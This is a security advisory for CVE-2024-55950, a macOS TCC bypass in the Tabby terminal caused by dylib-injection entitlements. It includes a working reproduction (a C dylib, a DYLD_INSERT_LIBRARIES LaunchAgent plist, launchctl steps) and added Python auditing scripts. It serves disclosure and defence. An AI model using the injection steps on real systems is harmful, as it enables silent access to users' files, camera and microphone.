TCC Bypass via Unnecessary Permissive Entitlements in Tabby

High
Eugeny published GHSA-jx33-9jc7-24gc Dec 25, 2024

Package

tabby

Affected versions

<1.0.216

Patched versions

1.0.216

Description

Tabby terminal emulator contains overly permissive entitlements that are unnecessary for its core functionality and plugin system, creating potential security vulnerabilities. The application currently holds powerful permissions including camera, microphone access, and the ability to access personal folders (Downloads, Documents, etc.) through Apple Events, while also maintaining dangerous entitlements that enable code injection.

The concerning entitlements include:

  • com.apple.security.cs.allow-dyld-environment-variables
  • com.apple.security.cs.disable-library-validation

These entitlements are not required for Tabby's operation since:

  • Tabby's plugin system is NodeJS-based and doesn't require external native libraries
  • No environment variables are used in the JavaScript codebase
  • Other terminal emulators (like iTerm2 and waveterm) function without these entitlements

The combination of these unnecessary entitlements with Tabby's extensive TCC permissions (camera, microphone, and file access via Apple Events) creates a significant security risk.

Impact

The unnecessary entitlements enable multiple attack vectors:

TCC Bypass:

  • Attackers can use DYLD_INSERT_LIBRARIES injection or dylib hijacking to inject malicious code
  • Injected code inherits Tabby's extensive TCC permissions
  • Access to camera, microphone, and personal folders becomes possible without user consent

Privacy Implications:

  • Unauthorized access to sensitive hardware (camera, microphone)
  • Access to personal directories through Apple Events
  • Potential for silent surveillance via hardware access

Security Compromise:

  • Malicious code execution within Tabby's context
  • Inheritance of all granted permissions
  • Bypass of macOS security controls despite hardened runtime

Considering Tabby's large user base and the extensive TCC permissions it holds, the consequences are particularly concerning.

Mitigation

Similar vulnerabilities involving TCC bypass through unnecessary entitlements have been documented in other popular applications:

  • CVE-2020-24259: Signal TCC bypass
  • CVE-2023-26818: Telegram TCC bypass

Tabby's situation warrants additional attention: terminal emulators often require elevated privileges, so a successful TCC bypass poses a higher risk. The current configuration exceeds the permissions Tabby's functionality needs, and comparable applications on the market demonstrate that these entitlements are not required for full terminal emulator operation with plugin support.

Recommended actions:

Since Tabby's plugins and themes are NodeJS-based without native libraries or frameworks, and no environment variables are used in the codebase, it is recommended to review and remove at least one of the two entitlements (com.apple.security.cs.disable-library-validation or com.apple.security.cs.allow-dyld-environment-variables). Removing either one prevents DYLD_INSERT_LIBRARIES injection while maintaining full application functionality.
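As an added example (not part of the advisory or the Tabby project), the following Python audits an app's entitlements the way the recommendation above describes: it parses the XML that `codesign -d --entitlements :- <app>` prints and flags only the full injection pair combined with a TCC-sensitive entitlement, since dropping either injection entitlement closes the DYLD_INSERT_LIBRARIES path. The sample plist is the affected Tabby build's entitlements as shown later on this page.

```python
import plistlib

# Entitlements that let foreign code load into a Hardened Runtime process.
INJECTION_ENTITLEMENTS = {
    "com.apple.security.cs.allow-dyld-environment-variables",
    "com.apple.security.cs.disable-library-validation",
}
# Entitlements whose TCC grants any injected code would inherit.
TCC_SENSITIVE_ENTITLEMENTS = {
    "com.apple.security.device.camera",
    "com.apple.security.device.microphone",
    "com.apple.security.automation.apple-events",
}

def audit_entitlement_dict(ents):
    """Flag the injection/TCC combination in an already-parsed entitlements dict."""
    granted = {k for k, v in ents.items() if v is True}
    injection = sorted(granted & INJECTION_ENTITLEMENTS)
    exposed = sorted(granted & TCC_SENSITIVE_ENTITLEMENTS)
    return {
        "injection_entitlements": injection,
        "tcc_entitlements": exposed,
        # Injecting an arbitrary dylib via DYLD_INSERT_LIBRARIES needs both
        # injection entitlements, so only the complete pair together with a
        # TCC-sensitive entitlement is reported as a bypass risk.
        "tcc_bypass_risk": len(injection) == len(INJECTION_ENTITLEMENTS) and bool(exposed),
    }

def audit_entitlements(plist_xml):
    """Parse the XML that `codesign -d --entitlements :- <app>` prints and audit it."""
    return audit_entitlement_dict(plistlib.loads(plist_xml))

# Entitlements of the affected Tabby build, copied from the advisory's codesign output.
TABBY_ENTITLEMENTS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>com.apple.security.automation.apple-events</key><true/>
<key>com.apple.security.cs.allow-dyld-environment-variables</key><true/>
<key>com.apple.security.cs.allow-jit</key><true/>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key><true/>
<key>com.apple.security.cs.disable-library-validation</key><true/>
<key>com.apple.security.device.camera</key><true/>
<key>com.apple.security.device.microphone</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    print(audit_entitlements(TABBY_ENTITLEMENTS))
```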

Reproduction

This vulnerability is relevant in post-exploitation scenarios where an attacker has already gained initial device access through methods such as service exploitation or phishing. After establishing a C2 or reverse shell connection with standard user privileges, the attacker faces TCC restrictions that prevent access to protected resources. Since C2 agents are not granted TCC permissions by default, Tabby's overly permissive entitlements become an attractive path to bypass these restrictions and reach protected resources. This scenario is common during the post-exploitation and local privilege escalation phases of an attack.

  1. Download the Tabby app from the official release and use the codesign utility to inspect its code signing information and entitlements. While Tabby has Hardened Runtime enabled, its dangerous entitlements leave it vulnerable to code injection. Additionally, as terminal emulator software, Tabby requires powerful TCC permissions for access to hardware and personal folders, and it may request access to other resources via Apple Events as needed. While even the root account cannot access these components without user approval, an attacker can bypass TCC and access them without user approval or awareness.
adler@adlers-Mac-mini /Applications % codesign -dv --entitlement :- /Applications/Tabby.app | xmllint --format -
Executable=/Applications/Tabby.app/Contents/MacOS/Tabby
Identifier=org.tabby
Format=app bundle with Mach-O thin (arm64)
CodeDirectory v=20500 size=757 flags=0x10000(runtime) hashes=13+7 location=embedded
Signature size=8995
Timestamp=Sep 26, 2024 at 4:16:48 AM
Info.plist entries=38
TeamIdentifier=V4JSMC46SY
Runtime Version=14.0.0
Sealed Resources version=2 rules=13 files=1593
Internal requirements count=1 size=172
warning: Specifying ':' in the path is deprecated and will not work in a future release
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>com.apple.security.automation.apple-events</key>
    <true/>
    <key>com.apple.security.cs.allow-dyld-environment-variables</key>
    <true/>
    <key>com.apple.security.cs.allow-jit</key>
    <true/>
    <key>com.apple.security.cs.allow-unsigned-executable-memory</key>
    <true/>
    <key>com.apple.security.cs.disable-library-validation</key>
    <true/>
    <key>com.apple.security.device.camera</key>
    <true/>
    <key>com.apple.security.device.microphone</key>
    <true/>
  </dict>
</plist>
  2. Create a custom dylib that accesses the TCC-protected Downloads folder, and compile it.
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>

/* Constructor: dyld runs this automatically when the library is loaded into the host process. */
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
    printf("[+] Crafted dylib is triggered\n");
    syslog(LOG_ERR, "[+] Crafted dylib is triggered\n");
    FILE *fp;
    char path[1035];
    /* The listing only succeeds if the host process holds the TCC grant for Downloads. */
    fp = popen("ls -Ol /Users/adler/Downloads", "r");
    if (fp == NULL) {
        printf("Failed to run command\n");
        return;  /* do not read from a NULL stream */
    }

    while (fgets(path, sizeof(path), fp) != NULL) {
        printf("%s", path);
    }

    pclose(fp);
}
  3. Create a plist file named com.tabby.launcher.plist under ~/Library/LaunchAgents/. This file specifies the DYLD_INSERT_LIBRARIES environment variable, the program and its arguments, and the output file location.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
       <key>Label</key>
        <string>com.tabby.launcher</string>
        <key>RunAtLoad</key>
        <true/>
        <key>EnvironmentVariables</key>
        <dict>
          <key>DYLD_INSERT_LIBRARIES</key>
          <string>/Users/adler/tcc-exp/downloads_folder.dylib</string>
        </dict>
        <key>ProgramArguments</key>
        <array>
          <string>/Applications/Tabby.app/Contents/MacOS/Tabby</string>
        </array>
        <key>StandardOutPath</key>
        <string>/tmp/tabby.log</string>
        <key>StandardErrorPath</key>
        <string>/tmp/tabby.log</string>
</dict>
</plist>
  4. Before exploitation, demonstrate the initial security state by confirming that the Downloads folder is inaccessible even with root privileges. Then run launchctl load ~/Library/LaunchAgents/com.tabby.launcher.plist, which launches Tabby as a launchd job so it does not inherit the parent process's sandbox profile. Check /tmp/tabby.log to verify that the contents of the Downloads folder are now listed, confirming a successful TCC bypass. The same approach can be extended to other TCC-protected resources, including the Documents folder, camera, and microphone.
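From the defender's side, the LaunchAgent in step 3 is a detectable artifact: a launchd job that sets DYLD_* loader variables and points ProgramArguments at a signed app bundle. The following Python is an added example (not from the advisory or Tabby) that parses one LaunchAgent/LaunchDaemon plist and reports that pattern; the sample plist is the one from the reproduction steps above.

```python
import plistlib

# Loader variables that make dyld pull extra code into the launched process.
DYLD_VARS = ("DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH", "DYLD_FRAMEWORK_PATH")

def find_dyld_injection(job):
    """Return a finding dict for a parsed launchd job that sets DYLD_* variables, else None."""
    env = job.get("EnvironmentVariables") or {}
    hits = {k: v for k, v in env.items() if k in DYLD_VARS}
    if not hits:
        return None
    args = job.get("ProgramArguments") or []
    program = job.get("Program") or (args[0] if args else "")
    return {
        "label": job.get("Label", ""),
        "program": program,
        "dyld_vars": hits,
        # DYLD_* aimed at an app bundle executable is the pattern from the
        # reproduction steps: the dylib rides in under that app's entitlements
        # and inherits its TCC grants.
        "targets_app_bundle": ".app/Contents/MacOS/" in program,
        "run_at_load": bool(job.get("RunAtLoad", False)),
    }

def scan_launch_agent(plist_xml):
    """Parse one LaunchAgent/LaunchDaemon plist (XML bytes) and run the check on it."""
    return find_dyld_injection(plistlib.loads(plist_xml))

# The LaunchAgent plist from the reproduction steps, used here as the sample input.
SAMPLE_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.tabby.launcher</string>
<key>RunAtLoad</key><true/>
<key>EnvironmentVariables</key><dict>
<key>DYLD_INSERT_LIBRARIES</key><string>/Users/adler/tcc-exp/downloads_folder.dylib</string>
</dict>
<key>ProgramArguments</key><array>
<string>/Applications/Tabby.app/Contents/MacOS/Tabby</string>
</array>
</dict></plist>"""

if __name__ == "__main__":
    print(scan_launch_agent(SAMPLE_AGENT))
```

In practice the same check is run over every plist in ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons.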
Severity

High

CVE ID

CVE-2024-55950

Weaknesses

No CWEs

Credits